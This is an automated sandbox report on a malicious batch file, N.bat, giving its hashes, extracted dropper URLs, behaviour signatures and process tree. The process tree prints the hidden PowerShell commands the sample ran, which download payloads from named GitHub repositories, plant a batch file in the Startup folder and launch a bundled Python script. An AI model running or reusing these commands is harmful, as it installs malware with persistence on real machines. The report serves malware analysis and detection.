Overview

overview

10

Static

static

1

N.bat

windows10-1703-x64

10

N.bat

windows7-x64

10

N.bat

windows10-2004-x64

10

N.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2024 09:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    N.bat

  • Size

    28KB

  • MD5

    a32f8b613ddf66ea93311118d63bd110

  • SHA1

    fd19d211cf4b5feb8beaf5a41daca864ae6e02c6

  • SHA256

    9fb8611f27b895e6d7a42435ea9b2fb13f18b2e9ccdb715ecf3281d75e3be0fb

  • SHA512

    e0372c6e8ee4a0ee2fede0f5579d84f1fd34db57fac0c203e53e4289980e58d53533deca29e637efb4a336003eb55e74ec192a175e8e008883b241d0ce005f03

  • SSDEEP

    768:Wjj49w9xfoeRkPEE/Z4eFVohU24vN1UZ3t8XYDTZvQlhXNM47PGZYqU6Qa31lqHZ:IOZ4eFVohU24vNBORQlhXNM47Pq2L+ls

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/bao3125/ff/raw/main/Documen.zip

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\N.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
        PID:2296
      • C:\Windows\system32\find.exe
        find
        2⤵
          PID:1664
        • C:\Windows\system32\findstr.exe
          findstr /L /I set C:\Users\Admin\AppData\Local\Temp\N.bat
          2⤵
            PID:1856
          • C:\Windows\system32\findstr.exe
            findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\N.bat
            2⤵
              PID:2376
            • C:\Windows\system32\findstr.exe
              findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\N.bat
              2⤵
                PID:2368
              • C:\Windows\system32\findstr.exe
                findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\N.bat
                2⤵
                  PID:1708
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c type tmp
                  2⤵
                    PID:2852
                  • C:\Windows\system32\find.exe
                    find
                    2⤵
                      PID:1948
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c type tmp
                      2⤵
                        PID:2328
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"
                        2⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Drops startup file
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3060
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/ff/raw/main/Documen.zip', 'C:\Users\Public\Document.zip')"
                        2⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2488
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2464
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3008

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\tmp
                      Filesize

                      14B

                      MD5

                      ce585c6ba32ac17652d2345118536f9c

                      SHA1

                      be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                      SHA256

                      589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                      SHA512

                      d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                      Download Submit
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                      Filesize

                      7KB

                      MD5

                      1b5b4d82f6120ac012077a2748c487a4

                      SHA1

                      3a28e4991f7b2772b9c5d5f027bd54b5bd89a8ab

                      SHA256

                      b5c5ebdb227c64ca85a3e280fc4d11be0fdb6f336637c1989a9a30d857235d8f

                      SHA512

                      58f58235eb2ae18c2a8d99137e75539af2b027da2ec16416a74ff488e4aabf9c70d7f6dfa6b5be848481dfce40ae2532730c6779ece16a28f0bfb5c80239a218

                      Download Submit
                    • memory/2488-17-0x000000001B690000-0x000000001B972000-memory.dmp
                      Filesize

                      2.9MB

                      Download
                    • memory/2488-18-0x0000000001E80000-0x0000000001E88000-memory.dmp
                      Filesize

                      32KB

                      Download
                    • memory/3060-8-0x0000000002BD0000-0x0000000002C50000-memory.dmp
                      Filesize

                      512KB

                      Download
                    • memory/3060-9-0x000000001B570000-0x000000001B852000-memory.dmp
                      Filesize

                      2.9MB

                      Download
                    • memory/3060-10-0x0000000002310000-0x0000000002318000-memory.dmp
                      Filesize

                      32KB

                      Download
                    • memory/3060-11-0x0000000002BD0000-0x0000000002C50000-memory.dmp
                      Filesize

                      512KB

                      Download